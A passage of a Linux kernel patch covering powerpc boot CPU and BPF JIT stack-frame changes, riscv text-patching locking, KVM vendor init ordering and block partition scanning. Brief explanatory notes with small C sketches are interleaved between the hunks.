+-	allocate_paca(boot_cpuid);
+-	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+-
+ #ifdef CONFIG_PPC_POWERNV
+ 	/* Scan and build the list of machine check recoverable ranges */
+ 	of_scan_flat_dt(early_init_dt_scan_recoverable_ranges, NULL);
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index 9b10e57040c6c..e77734e5a127f 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -87,6 +87,10 @@ EXPORT_SYMBOL(machine_id);
+ int boot_cpuid = -1;
+ EXPORT_SYMBOL_GPL(boot_cpuid);
+ 
++#ifdef CONFIG_PPC64
++int boot_cpu_hwid = -1;
++#endif
++
+ /*
+  * These are used in binfmt_elf.c to put aux entries on the stack
+  * for each elf executable being started.
+diff --git a/arch/powerpc/kernel/setup_64.c b/arch/powerpc/kernel/setup_64.c
+index a0dee7354fe6b..b2e0d3ce4261c 100644
+--- a/arch/powerpc/kernel/setup_64.c
++++ b/arch/powerpc/kernel/setup_64.c
+@@ -385,17 +385,21 @@ void __init early_setup(unsigned long dt_ptr)
+ 	/*
+ 	 * Do early initialization using the flattened device
+ 	 * tree, such as retrieving the physical memory map or
+-	 * calculating/retrieving the hash table size.
++	 * calculating/retrieving the hash table size, and discovering
++	 * boot_cpuid and boot_cpu_hwid.
+ 	 */
+ 	early_init_devtree(__va(dt_ptr));
+ 
+-	/* Now we know the logical id of our boot cpu, setup the paca. */
+-	if (boot_cpuid != 0) {
+-		/* Poison paca_ptrs[0] again if it's not the boot cpu */
+-		memset(&paca_ptrs[0], 0x88, sizeof(paca_ptrs[0]));
+-	}
++	allocate_paca_ptrs();
++	allocate_paca(boot_cpuid);
++	set_hard_smp_processor_id(boot_cpuid, boot_cpu_hwid);
+ 	fixup_boot_paca(paca_ptrs[boot_cpuid]);
+ 	setup_paca(paca_ptrs[boot_cpuid]); /* install the paca into registers */
++	// smp_processor_id() now reports boot_cpuid
++
++#ifdef CONFIG_SMP
++	task_thread_info(current)->cpu = boot_cpuid; // fix task_cpu(current)
++#endif
+ 
+ 	/*
+ 	 * Configure exception handlers. This includes setting up trampolines
+diff --git a/arch/powerpc/kernel/time.c b/arch/powerpc/kernel/time.c
+index e26eb6618ae5d..9d8665910350c 100644
+--- a/arch/powerpc/kernel/time.c
++++ b/arch/powerpc/kernel/time.c
+@@ -356,7 +356,7 @@ void vtime_flush(struct task_struct *tsk)
+ }
+ #endif /* CONFIG_VIRT_CPU_ACCOUNTING_NATIVE */
+ 
+-void __delay(unsigned long loops)
++void __no_kcsan __delay(unsigned long loops)
+ {
+ 	unsigned long start;
+ 
+@@ -377,7 +377,7 @@ void __delay(unsigned long loops)
+ }
+ EXPORT_SYMBOL(__delay);
+ 
+-void udelay(unsigned long usecs)
++void __no_kcsan udelay(unsigned long usecs)
+ {
+ 	__delay(tb_ticks_per_usec * usecs);
+ }
+diff --git a/arch/powerpc/net/bpf_jit_comp32.c b/arch/powerpc/net/bpf_jit_comp32.c
+index a379b0ce19ffa..8643b2c8b76ef 100644
+--- a/arch/powerpc/net/bpf_jit_comp32.c
++++ b/arch/powerpc/net/bpf_jit_comp32.c
+@@ -79,6 +79,20 @@ static int bpf_jit_stack_offsetof(struct codegen_context *ctx, int reg)
+ #define SEEN_NVREG_FULL_MASK	0x0003ffff /* Non volatile registers r14-r31 */
+ #define SEEN_NVREG_TEMP_MASK	0x00001e01 /* BPF_REG_5, BPF_REG_AX, TMP_REG */
+ 
++static inline bool bpf_has_stack_frame(struct codegen_context *ctx)
++{
++	/*
++	 * We only need a stack frame if:
++	 * - we call other functions (kernel helpers), or
++	 * - we use non-volatile registers, or
++	 * - we use the tail call counter, or
++	 * - the bpf program uses its stack area
++	 * The latter condition is deduced from the usage of BPF_REG_FP
++	 */
++	return ctx->seen & (SEEN_FUNC | SEEN_TAILCALL | SEEN_NVREG_FULL_MASK) ||
++	       bpf_is_seen_register(ctx, bpf_to_ppc(BPF_REG_FP));
++}
++
+ void bpf_jit_realloc_regs(struct codegen_context *ctx)
+ {
+ 	unsigned int nvreg_mask;
+@@ -118,7 +132,8 @@ void bpf_jit_build_prologue(u32 *image, struct codegen_context *ctx)
+ 
+ #define BPF_TAILCALL_PROLOGUE_SIZE	4
+ 
+-	EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_TAILCALL)
+ 		EMIT(PPC_RAW_STW(_R4, _R1, bpf_jit_stack_offsetof(ctx, BPF_PPC_TC)));
+@@ -171,7 +186,8 @@ static void bpf_jit_emit_common_epilogue(u32 *image, struct codegen_context *ctx
+ 		EMIT(PPC_RAW_LWZ(_R0, _R1, BPF_PPC_STACKFRAME(ctx) + PPC_LR_STKOFF));
+ 
+ 	/* Tear down our stack frame */
+-	EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_FUNC)
+ 		EMIT(PPC_RAW_MTLR(_R0));
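
The JIT hunks above skip emitting stack-frame setup and teardown entirely when
nothing in the program needs a frame. The test itself is just a bitmask over
features recorded while scanning the program; a compact sketch (the SEEN_*
values here are illustrative, not the kernel's):

#include <stdbool.h>
#include <stdint.h>

#define SEEN_FUNC      0x1   /* calls kernel helpers        */
#define SEEN_TAILCALL  0x2   /* uses the tail-call counter  */
#define SEEN_NVREG     0x4   /* uses non-volatile registers */
#define SEEN_FP        0x8   /* touches the BPF stack area  */

static bool needs_stack_frame(uint32_t seen)
{
	/* Any of these needs spill space or a saved link register. */
	return (seen & (SEEN_FUNC | SEEN_TAILCALL | SEEN_NVREG | SEEN_FP)) != 0;
}
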
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 56b9219981665..5931a0ff3c814 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -87,6 +87,13 @@ endif
+ # Avoid generating .eh_frame sections.
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables
+ 
++# The RISC-V attributes frequently cause compatibility issues and provide no
++# useful information, so just turn them off.
++KBUILD_CFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_AFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_CFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++KBUILD_AFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ KBUILD_CFLAGS_MODULE += $(call cc-option,-mno-relax)
+ KBUILD_AFLAGS_MODULE += $(call as-option,-Wa$(comma)-mno-relax)
+ 
+diff --git a/arch/riscv/errata/sifive/errata.c b/arch/riscv/errata/sifive/errata.c
+index 1031038423e74..c24a349dd026d 100644
+--- a/arch/riscv/errata/sifive/errata.c
++++ b/arch/riscv/errata/sifive/errata.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/bug.h>
+@@ -107,7 +108,9 @@ void __init_or_module sifive_errata_patch_func(struct alt_entry *begin,
+ 
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
+ 			cpu_apply_errata |= tmp;
+ 		}
+ 	}
+diff --git a/arch/riscv/errata/thead/errata.c b/arch/riscv/errata/thead/errata.c
+index fac5742d1c1e6..9d71fe3d35c77 100644
+--- a/arch/riscv/errata/thead/errata.c
++++ b/arch/riscv/errata/thead/errata.c
+@@ -5,6 +5,7 @@
+ 
+ #include <linux/bug.h>
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/uaccess.h>
+@@ -97,11 +98,14 @@ void __init_or_module thead_errata_patch_func(struct alt_entry *begin, struct al
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
+ 			/* On vm-alternatives, the mmu isn't running yet */
+-			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT)
++			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT) {
+ 				memcpy((void *)__pa_symbol(alt->old_ptr),
+ 				       (void *)__pa_symbol(alt->alt_ptr), alt->alt_len);
+-			else
++			} else {
++				mutex_lock(&text_mutex);
+ 				patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++				mutex_unlock(&text_mutex);
++			}
+ 		}
+ 	}
+ 
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 9e73922e1e2e5..d47d87c2d7e3d 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -109,6 +109,6 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec);
+ #define ftrace_init_nop ftrace_init_nop
+ #endif
+ 
+-#endif
++#endif /* CONFIG_DYNAMIC_FTRACE */
+ 
+ #endif /* _ASM_RISCV_FTRACE_H */
+diff --git a/arch/riscv/include/asm/parse_asm.h b/arch/riscv/include/asm/parse_asm.h
+index f36368de839f5..3cd00332d70f5 100644
+--- a/arch/riscv/include/asm/parse_asm.h
++++ b/arch/riscv/include/asm/parse_asm.h
+@@ -3,6 +3,9 @@
+  * Copyright (C) 2020 SiFive
+  */
+ 
++#ifndef _ASM_RISCV_INSN_H
++#define _ASM_RISCV_INSN_H
++
+ #include <linux/bits.h>
+ 
+ /* The bit field of immediate value in I-type instruction */
+@@ -217,3 +220,5 @@ static inline bool is_ ## INSN_NAME ## _insn(long insn) \
+ 	(RVC_X(x_, RVC_B_IMM_5_OPOFF, RVC_B_IMM_5_MASK) << RVC_B_IMM_5_OFF) | \
+ 	(RVC_X(x_, RVC_B_IMM_7_6_OPOFF, RVC_B_IMM_7_6_MASK) << RVC_B_IMM_7_6_OFF) | \
+ 	(RVC_IMM_SIGN(x_) << RVC_B_IMM_SIGN_OFF); })
++
++#endif /* _ASM_RISCV_INSN_H */
+diff --git a/arch/riscv/include/asm/patch.h b/arch/riscv/include/asm/patch.h
+index 9a7d7346001ee..98d9de07cba17 100644
+--- a/arch/riscv/include/asm/patch.h
++++ b/arch/riscv/include/asm/patch.h
+@@ -9,4 +9,6 @@
+ int patch_text_nosync(void *addr, const void *insns, size_t len);
+ int patch_text(void *addr, u32 insn);
+ 
++extern int riscv_patch_in_stop_machine;
++
+ #endif /* _ASM_RISCV_PATCH_H */
+diff --git a/arch/riscv/kernel/compat_vdso/Makefile b/arch/riscv/kernel/compat_vdso/Makefile
+index 260daf3236d3a..7f34f3c7c8827 100644
+--- a/arch/riscv/kernel/compat_vdso/Makefile
++++ b/arch/riscv/kernel/compat_vdso/Makefile
+@@ -14,6 +14,10 @@ COMPAT_LD := $(LD)
+ COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
+ COMPAT_LD_FLAGS := -melf32lriscv
+ 
++# Disable attributes, as they're useless and break the build.
++COMPAT_CC_FLAGS += $(call cc-option,-mno-riscv-attribute)
++COMPAT_CC_FLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ # Files to link into the compat_vdso
+ obj-compat_vdso = $(patsubst %, %.o, $(compat_vdso-syms)) note.o
+ 
+diff --git a/arch/riscv/kernel/cpufeature.c b/arch/riscv/kernel/cpufeature.c
+index 93e45560af307..5a82d5520a1fd 100644
+--- a/arch/riscv/kernel/cpufeature.c
++++ b/arch/riscv/kernel/cpufeature.c
+@@ -10,6 +10,7 @@
+ #include <linux/ctype.h>
+ #include <linux/libfdt.h>
+ #include <linux/log2.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+ #include <asm/alternative.h>
+@@ -339,8 +340,11 @@ void __init_or_module riscv_cpufeature_patch_func(struct alt_entry *begin,
+ 		}
+ 
+ 		tmp = (1U << alt->errata_id);
+-		if (cpu_req_feature & tmp)
++		if (cpu_req_feature & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
++		}
+ 	}
+ }
+ #endif
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 5bff37af4770b..03a6434a8cdd0 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -15,10 +15,19 @@
+ void ftrace_arch_code_modify_prepare(void) __acquires(&text_mutex)
+ {
+ 	mutex_lock(&text_mutex);
++
++	/*
++	 * The code sequences we use for ftrace can't be patched while the
++	 * kernel is running, so we need to use stop_machine() to modify them
++	 * for now.  This doesn't play nice with text_mutex, so we use this
++	 * flag to elide the check.
++	 */
++	riscv_patch_in_stop_machine = true;
+ }
+ 
+ void ftrace_arch_code_modify_post_process(void) __releases(&text_mutex)
+ {
++	riscv_patch_in_stop_machine = false;
+ 	mutex_unlock(&text_mutex);
+ }
+ 
+@@ -107,9 +116,9 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ {
+ 	int out;
+ 
+-	ftrace_arch_code_modify_prepare();
++	mutex_lock(&text_mutex);
+ 	out = ftrace_make_nop(mod, rec, MCOUNT_ADDR);
+-	ftrace_arch_code_modify_post_process();
++	mutex_unlock(&text_mutex);
+ 
+ 	return out;
+ }
+diff --git a/arch/riscv/kernel/patch.c b/arch/riscv/kernel/patch.c
+index 765004b605132..e099961453cca 100644
+--- a/arch/riscv/kernel/patch.c
++++ b/arch/riscv/kernel/patch.c
+@@ -11,6 +11,7 @@
+ #include <asm/kprobes.h>
+ #include <asm/cacheflush.h>
+ #include <asm/fixmap.h>
++#include <asm/ftrace.h>
+ #include <asm/patch.h>
+ 
+ struct patch_insn {
+@@ -19,6 +20,8 @@ struct patch_insn {
+ 	atomic_t cpu_count;
+ };
+ 
++int riscv_patch_in_stop_machine = false;
++
+ #ifdef CONFIG_MMU
+ /*
+  * The fix_to_virt(, idx) needs a const value (not a dynamic variable of
+@@ -59,8 +62,15 @@ static int patch_insn_write(void *addr, const void *insn, size_t len)
+ 	 * Before reaching here, it was expected to lock the text_mutex
+ 	 * already, so we don't need to take another lock here and can
+ 	 * ensure that it is safe across all cores.
++	 *
++	 * We're currently using stop_machine() for ftrace & kprobes, and while
++	 * that ensures text_mutex is held before installing the mappings, it
++	 * does not ensure text_mutex is held by the calling thread.  That's
++	 * safe but triggers a lockdep failure, so just elide it for that
++	 * specific case.
+ 	 */
+-	lockdep_assert_held(&text_mutex);
++	if (!riscv_patch_in_stop_machine)
++		lockdep_assert_held(&text_mutex);
+ 
+ 	if (across_pages)
+ 		patch_map(addr + len, FIX_TEXT_POKE1);
+@@ -121,13 +131,25 @@ NOKPROBE_SYMBOL(patch_text_cb);
+ 
+ int patch_text(void *addr, u32 insn)
+ {
++	int ret;
+ 	struct patch_insn patch = {
+ 		.addr = addr,
+ 		.insn = insn,
+ 		.cpu_count = ATOMIC_INIT(0),
+ 	};
+ 
+-	return stop_machine_cpuslocked(patch_text_cb,
+-				       &patch, cpu_online_mask);
++	/*
++	 * kprobes takes text_mutex before calling patch_text(), but as we then
++	 * call stop_machine(), the lockdep assertion in patch_insn_write()
++	 * gets confused by the context in which the lock is taken.
++	 * Instead, ensure the lock is held before calling stop_machine(), and
++	 * set riscv_patch_in_stop_machine to skip the check in
++	 * patch_insn_write().
++	 */
++	lockdep_assert_held(&text_mutex);
++	riscv_patch_in_stop_machine = true;
++	ret = stop_machine_cpuslocked(patch_text_cb, &patch, cpu_online_mask);
++	riscv_patch_in_stop_machine = false;
++	return ret;
+ }
+ NOKPROBE_SYMBOL(patch_text);
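
Both patch.c hunks rely on one pattern: the initiating thread takes text_mutex,
sets a flag, and the low-level writer skips the ownership assertion while the
flag is set, because stop_machine() workers are not the lock owner even though
the lock is held. A self-contained sketch of the pattern (lock_held and
in_stop_machine are illustrative, not kernel symbols):

#include <assert.h>
#include <pthread.h>
#include <stdbool.h>

static pthread_mutex_t text_lock = PTHREAD_MUTEX_INITIALIZER;
static bool lock_held;          /* bookkeeping for the assertion below */
static bool in_stop_machine;    /* mirrors riscv_patch_in_stop_machine */

static void insn_write(void)
{
	/* Stand-in for: if (!riscv_patch_in_stop_machine)
	 *                       lockdep_assert_held(&text_mutex);      */
	if (!in_stop_machine)
		assert(lock_held);
}

static void patch_one(void)
{
	pthread_mutex_lock(&text_lock);
	lock_held = true;

	in_stop_machine = true;
	insn_write();           /* in the kernel this runs on every CPU */
	in_stop_machine = false;

	lock_held = false;
	pthread_mutex_unlock(&text_lock);
}
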
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index f9a5a7c90ff09..64a9c093aef93 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -101,7 +101,7 @@ void notrace walk_stackframe(struct task_struct *task,
+ 	while (!kstack_end(ksp)) {
+ 		if (__kernel_text_address(pc) && unlikely(!fn(arg, pc)))
+ 			break;
+-		pc = (*ksp++) - 0x4;
++		pc = READ_ONCE_NOCHECK(*ksp++) - 0x4;
+ 	}
+ }
+ 
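
The stacktrace fix wraps the racy read of another task's stack slot in
READ_ONCE_NOCHECK(), which forces a single untorn load and also tells KASAN
not to validate the access. The load-forcing half of that can be sketched
with a volatile cast:

#include <stdint.h>

/*
 * Force a single load the compiler can neither elide nor re-read; the
 * kernel's _NOCHECK variant additionally suppresses KASAN checking,
 * which matters when walking a stack that another task may be using.
 */
static inline uintptr_t read_once(const uintptr_t *p)
{
	return *(const volatile uintptr_t *)p;
}
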
+diff --git a/arch/um/kernel/vmlinux.lds.S b/arch/um/kernel/vmlinux.lds.S
+index 16e49bfa2b426..53d719c04ba94 100644
+--- a/arch/um/kernel/vmlinux.lds.S
++++ b/arch/um/kernel/vmlinux.lds.S
+@@ -1,4 +1,4 @@
+-
++#define RUNTIME_DISCARD_EXIT
+ KERNEL_STACK_SIZE = 4096 * (1 << CONFIG_KERNEL_STACK_ORDER);
+ 
+ #ifdef CONFIG_LD_SCRIPT_STATIC
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 6aaae18f18544..24480b4f1c575 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1760,6 +1760,9 @@ extern struct kvm_x86_ops kvm_x86_ops;
+ #define KVM_X86_OP_OPTIONAL_RET0 KVM_X86_OP
+ #include <asm/kvm-x86-ops.h>
+ 
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops);
++void kvm_x86_vendor_exit(void);
++
+ #define __KVM_HAVE_ARCH_VM_ALLOC
+ static inline struct kvm *kvm_arch_alloc_vm(void)
+ {
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index f769d6d08b433..06f2ede1544f4 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -880,6 +880,15 @@ void init_spectral_chicken(struct cpuinfo_x86 *c)
+ 		}
+ 	}
+ #endif
++	/*
++	 * Work around Erratum 1386.  The XSAVES instruction malfunctions in
++	 * certain circumstances on Zen1/2 uarch, and not all parts have had
++	 * updated microcode at the time of writing (March 2023).
++	 *
++	 * Affected parts all have no supervisor XSAVE states, meaning that
++	 * the XSAVEC instruction (which works fine) is equivalent.
++	 */
++	clear_cpu_cap(c, X86_FEATURE_XSAVES);
+ }
+ 
+ static void init_amd_zn(struct cpuinfo_x86 *c)
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 22d054ba5939a..f03bdaf79c886 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -5097,15 +5097,34 @@ static struct kvm_x86_init_ops svm_init_ops __initdata = {
+ 
+ static int __init svm_init(void)
+ {
++	int r;
++
+ 	__unused_size_checks();
+ 
+-	return kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
+-			__alignof__(struct vcpu_svm), THIS_MODULE);
++	r = kvm_x86_vendor_init(&svm_init_ops);
++	if (r)
++		return r;
++
++	/*
++	 * Common KVM initialization _must_ come last; after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
++		     __alignof__(struct vcpu_svm), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
++	return 0;
++
++err_kvm_init:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ 
+ static void __exit svm_exit(void)
+ {
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ }
+ 
+ module_init(svm_init)
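
The svm_init() rework above (mirrored for VMX further down) enforces a single
rule: the step that exposes /dev/kvm to userspace must run last, and any
failure unwinds whatever was initialized before it, in reverse order. The
generic shape, with illustrative names standing in for the KVM functions:

static int vendor_init(void)       { return 0; }  /* kvm_x86_vendor_init() */
static void vendor_exit(void)      { }            /* kvm_x86_vendor_exit() */
static int publish_interface(void) { return 0; }  /* kvm_init()            */

static int demo_init(void)
{
	int r;

	r = vendor_init();
	if (r)
		return r;

	r = publish_interface();        /* user-visible step comes last */
	if (r)
		goto err_publish;

	return 0;

err_publish:
	vendor_exit();                  /* unwind in reverse order */
	return r;
}
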
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 939e395cda3ff..cb547a0833812 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -551,6 +551,33 @@ static int hv_enable_l2_tlb_flush(struct kvm_vcpu *vcpu)
+ 	return 0;
+ }
+ 
++static void hv_reset_evmcs(void)
++{
++	struct hv_vp_assist_page *vp_ap;
++
++	if (!static_branch_unlikely(&enable_evmcs))
++		return;
++
++	/*
++	 * KVM should enable eVMCS if and only if all CPUs have a VP assist
++	 * page, and should reject CPU onlining if eVMCS is enabled but the
++	 * CPU doesn't have a VP assist page allocated.
++	 */
++	vp_ap = hv_get_vp_assist_page(smp_processor_id());
++	if (WARN_ON_ONCE(!vp_ap))
++		return;
++
++	/*
++	 * Reset everything to support using non-enlightened VMCS access later
++	 * (e.g. when we reload the module with enlightened_vmcs=0)
++	 */
++	vp_ap->nested_control.features.directhypercall = 0;
++	vp_ap->current_nested_vmcs = 0;
++	vp_ap->enlighten_vmentry = 0;
++}
++
++#else /* IS_ENABLED(CONFIG_HYPERV) */
++static void hv_reset_evmcs(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ /*
+@@ -2527,6 +2554,8 @@ static void vmx_hardware_disable(void)
+ 	if (cpu_vmxoff())
+ 		kvm_spurious_fault();
+ 
++	hv_reset_evmcs();
++
+ 	intel_pt_handle_vmx(0);
+ }
+ 
+@@ -8492,41 +8521,23 @@ static void vmx_cleanup_l1d_flush(void)
+ 	l1tf_vmx_mitigation = VMENTER_L1D_FLUSH_AUTO;
+ }
+ 
+-static void vmx_exit(void)
++static void __vmx_exit(void)
+ {
++	allow_smaller_maxphyaddr = false;
++
+ #ifdef CONFIG_KEXEC_CORE
+ 	RCU_INIT_POINTER(crash_vmclear_loaded_vmcss, NULL);
+ 	synchronize_rcu();
+ #endif
++	vmx_cleanup_l1d_flush();
++}
+ 
++static void vmx_exit(void)
++{
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ 
+-#if IS_ENABLED(CONFIG_HYPERV)
+-	if (static_branch_unlikely(&enable_evmcs)) {
+-		int cpu;
+-		struct hv_vp_assist_page *vp_ap;
+-		/*
+-		 * Reset everything to support using non-enlightened VMCS
+-		 * access later (e.g. when we reload the module with
+-		 * enlightened_vmcs=0)
+-		 */
+-		for_each_online_cpu(cpu) {
+-			vp_ap =	hv_get_vp_assist_page(cpu);
+-
+-			if (!vp_ap)
+-				continue;
+-
+-			vp_ap->nested_control.features.directhypercall = 0;
+-			vp_ap->current_nested_vmcs = 0;
+-			vp_ap->enlighten_vmentry = 0;
+-		}
+-
+-		static_branch_disable(&enable_evmcs);
+-	}
+-#endif
+-	vmx_cleanup_l1d_flush();
+-
+-	allow_smaller_maxphyaddr = false;
++	__vmx_exit();
+ }
+ module_exit(vmx_exit);
+ 
+@@ -8567,23 +8578,20 @@ static int __init vmx_init(void)
+ 	}
+ #endif
+ 
+-	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
+-		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	r = kvm_x86_vendor_init(&vmx_init_ops);
+ 	if (r)
+ 		return r;
+ 
+ 	/*
+-	 * Must be called after kvm_init() so enable_ept is properly set
++	 * Must be called after common x86 init so enable_ept is properly set
+ 	 * up. Hand in the parameter mitigation value which was stored in
+ 	 * the pre module init parser. If no parameter was given, it will
+ 	 * contain 'auto' which will be turned into the default 'cond'
+ 	 * mitigation mode.
+ 	 */
+ 	r = vmx_setup_l1d_flush(vmentry_l1d_flush_param);
+-	if (r) {
+-		vmx_exit();
+-		return r;
+-	}
++	if (r)
++		goto err_l1d_flush;
+ 
+ 	vmx_setup_fb_clear_ctrl();
+ 
+@@ -8607,6 +8615,21 @@ static int __init vmx_init(void)
+ 	if (!enable_ept)
+ 		allow_smaller_maxphyaddr = true;
+ 
++	/*
++	 * Common KVM initialization _must_ come last; after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
++		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
+ 	return 0;
++
++err_kvm_init:
++	__vmx_exit();
++err_l1d_flush:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ module_init(vmx_init);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index a2c299d47e69c..0ec7a0cb5da81 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9292,7 +9292,16 @@ static struct notifier_block pvclock_gtod_notifier = {
+ 
+ int kvm_arch_init(void *opaque)
+ {
+-	struct kvm_x86_init_ops *ops = opaque;
++	return 0;
++}
++
++void kvm_arch_exit(void)
++{
++}
++
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops)
++{
+ 	u64 host_pat;
+ 	int r;
+ 
+@@ -9382,8 +9391,9 @@ out_free_x86_emulator_cache:
+ 	kmem_cache_destroy(x86_emulator_cache);
+ 	return r;
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_init);
+ 
+-void kvm_arch_exit(void)
++void kvm_x86_vendor_exit(void)
+ {
+ #ifdef CONFIG_X86_64
+ 	if (hypervisor_is_type(X86_HYPER_MS_HYPERV))
+@@ -9410,6 +9420,7 @@ void kvm_arch_exit(void)
+ 	WARN_ON(static_branch_unlikely(&kvm_xen_enabled.key));
+ #endif
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_exit);
+ 
+ static int __kvm_emulate_halt(struct kvm_vcpu *vcpu, int state, int reason)
+ {
+diff --git a/block/blk.h b/block/blk.h
+index 4c3b3325219a5..e835f21d48af0 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -427,7 +427,7 @@ int bio_add_hw_page(struct request_queue *q, struct bio *bio,
+ 
+ struct request_queue *blk_alloc_queue(int node_id);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner);
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode);
+ 
+ int disk_alloc_events(struct gendisk *disk);
+ void disk_add_events(struct gendisk *disk);
+diff --git a/block/genhd.c b/block/genhd.c
+index 23cf83b3331cd..9c4c9aa559ab8 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -356,9 +356,10 @@ void disk_uevent(struct gendisk *disk, enum kobject_action action)
+ }
+ EXPORT_SYMBOL_GPL(disk_uevent);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ {
+ 	struct block_device *bdev;
++	int ret = 0;
+ 
+ 	if (disk->flags & (GENHD_FL_NO_PART | GENHD_FL_HIDDEN))
+ 		return -EINVAL;
+@@ -366,16 +367,29 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
+ 		return -EINVAL;
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+-	/* Someone else has bdev exclusively open? */
+-	if (disk->part0->bd_holder && disk->part0->bd_holder != owner)
+-		return -EBUSY;
+ 
+ 	set_bit(GD_NEED_PART_SCAN, &disk->state);
+-	bdev = blkdev_get_by_dev(disk_devt(disk), mode, NULL);
++	/*
++	 * If the device is already opened exclusively by the current thread,
++	 * it's safe to scan partitions; otherwise, use bd_prepare_to_claim() to
++	 * synchronize with other exclusive openers and other partition
++	 * scanners.
++	 */
++	if (!(mode & FMODE_EXCL)) {
++		ret = bd_prepare_to_claim(disk->part0, disk_scan_partitions);
++		if (ret)
++			return ret;
++	}
++
++	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+-		return PTR_ERR(bdev);
+-	blkdev_put(bdev, mode);
+-	return 0;
++		ret = PTR_ERR(bdev);
++	else
++		blkdev_put(bdev, mode & ~FMODE_EXCL);
++
